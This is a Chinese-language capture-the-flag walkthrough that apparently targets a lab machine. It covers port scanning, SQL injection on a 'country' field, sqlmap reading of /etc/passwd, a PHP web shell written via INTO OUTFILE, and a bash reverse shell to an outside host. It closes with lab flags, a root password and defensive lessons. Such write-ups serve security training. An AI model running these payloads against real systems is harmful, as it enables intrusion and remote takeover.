SQL注入与信息泄露权限提升实战教学<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>
目标IP地址: 10.10.11.116<\/code><\/li>
使用命令检查目标是否在线:<\/li>
<\/ul>
nmap -Pn -sn 10.10.11.116
<\/span><\/span><\/code><\/pre>1.2 端口扫描<\/h3>
使用masscan进行快速端口扫描:<\/p>
sudo masscan -p1-65535,U:1-65535 10.10.11.116 --rate=<\/span>1000<\/span> -e tun0
<\/span><\/span><\/code><\/pre>发现开放端口:<\/p>

22\/tcp: OpenSSH 8.2p1 Ubuntu 4ubuntu0.3<\/li>
80\/tcp: Apache httpd 2.4.48 (Debian)<\/li>
4566\/tcp: nginx (403 Forbidden)<\/li>
8080\/tcp: nginx (502 Bad Gateway)<\/li>
<\/ul>
1.3 服务版本探测<\/h3>
使用nmap进行详细扫描:<\/p>
nmap -Pn -sV -sC -p 22,80,4566,8080 10.10.11.116
<\/span><\/span><\/code><\/pre>2. Web应用测试<\/h2>
2.1 发现SQL注入漏洞<\/h3>
在http:\/\/10.10.11.116\/account.php<\/code>发现SQL注入点:<\/p>
POST<\/span> \/account.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 10.10.11.116<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>username=x&country='
<\/span><\/span><\/code><\/pre>2.2 手动验证SQL注入<\/h3>

测试UNION注入:<\/li>
<\/ol>
username=<\/span>x&<\/span>country=<\/span>' UNION SELECT 1--+
<\/span><\/span><\/span><\/code><\/pre>
测试ORDER BY确定列数:<\/li>
<\/ol>
username=<\/span>x&<\/span>country=<\/span>' ORDER BY 1--+
<\/span><\/span><\/span><\/code><\/pre>2.3 使用sqlmap自动化测试<\/h3>

基本检测:<\/li>
<\/ol>
python3 sqlmap.py -r sql --batch --level 5<\/span> --risk 3<\/span> -p 'country'<\/span>
<\/span><\/span><\/code><\/pre>
文件读取利用:<\/li>
<\/ol>
python3 sqlmap.py -r sql --batch --level 5<\/span> --risk 3<\/span> -p 'country'<\/span> --file-read=<\/span>'\/etc\/passwd'<\/span>
<\/span><\/span><\/code><\/pre>3. 漏洞利用<\/h2>
3.1 写入Web Shell<\/h3>
构造SQL注入写入PHP webshell:<\/p>
username=<\/span>x&<\/span>country=<\/span>' UNION SELECT "<?php SYSTEM($_REQUEST['<\/span>shell']);?>" INTO OUTFILE '<\/span>\/<\/span>var\/<\/span>www\/<\/span>html\/<\/span>shell.php'-- -
<\/span><\/span><\/span><\/code><\/pre>3.2 获取反向Shell<\/h3>
使用curl触发webshell执行反向shell:<\/p>
curl 'http:\/\/10.10.11.116\/shell.php'<\/span> --data-urlencode "shell=\/bin\/bash -c '\/bin\/bash -i >& \/dev\/tcp\/10.10.16.28\/445 0>&1'"<\/span>
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 获取用户flag<\/h3>
cat \/home\/user\/user.txt
<\/span><\/span><\/code><\/pre>用户flag: 3ac2b2e772e3990b49e4bff189e72540<\/code><\/p>
4.2 发现特权凭证<\/h3>
发现全局密码: uhc-9qual-global-pw<\/code><\/p>
4.3 获取root权限<\/h3>
使用发现的密码提升权限:<\/p>
su root
<\/span><\/span><\/code><\/pre>输入密码: uhc-9qual-global-pw<\/code><\/p>
4.4 获取root flag<\/h3>
cat \/root\/root.txt
<\/span><\/span><\/code><\/pre>root flag: c9c56229660a90c2f45caebacb21ecff<\/code><\/p>
5. 关键安全教训<\/h2>


输入验证不足<\/strong>:<\/p>

未对country参数进行有效过滤<\/li>
允许特殊字符如单引号导致SQL注入<\/li>
<\/ul>
<\/li>

权限配置不当<\/strong>:<\/p>

Web应用有写入web目录的权限<\/li>
使用root权限运行服务导致权限提升风险<\/li>
<\/ul>
<\/li>

信息泄露风险<\/strong>:<\/p>

全局密码硬编码或明文存储<\/li>
错误配置导致敏感信息可被读取<\/li>
<\/ul>
<\/li>

防御建议<\/strong>:<\/p>

使用参数化查询或ORM框架<\/li>
实施最小权限原则<\/li>
定期进行安全审计和渗透测试<\/li>
敏感信息加密存储<\/li>
<\/ul>
<\/li>
<\/ol>